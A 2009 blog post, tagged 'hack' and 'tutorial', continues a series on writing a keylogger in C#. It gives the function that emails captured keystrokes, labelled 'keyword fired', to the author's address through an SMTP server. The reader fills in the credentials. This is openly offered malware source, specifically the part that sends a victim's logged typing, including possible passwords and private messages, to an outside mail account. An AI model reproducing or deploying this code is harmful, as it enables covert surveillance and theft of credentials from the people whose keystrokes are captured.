Axino.net

Keylogger in C# :: sending emails

by Arxleol on Sunday 01.11.2009, under C#, hack, tutorial, windows

If you remember in previous tutorial about keylogger in C# you may have noticed that we invoke function for sending emails. Here is that function just remember that you need to change data for connecting to the smtp server.

 /*public void sendMailK()
        {
 
            MailMessage message = new MailMessage("keylogger", "arxleol@gmail.com", "keyword fired", writeUp);
            SmtpClient emailClient = new SmtpClient("either local host or google smtp or soemthing third");
            System.Net.NetworkCredential SMTPUserInfo = new System.Net.NetworkCredential("your username", "your password");
            emailClient.UseDefaultCredentials = false;
            emailClient.Credentials = SMTPUserInfo;
            emailClient.Send(message);
 
        }*/

Similar Posts:

:, , , , , , , ,
1 comment for this entry:

Leave a Reply

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Archives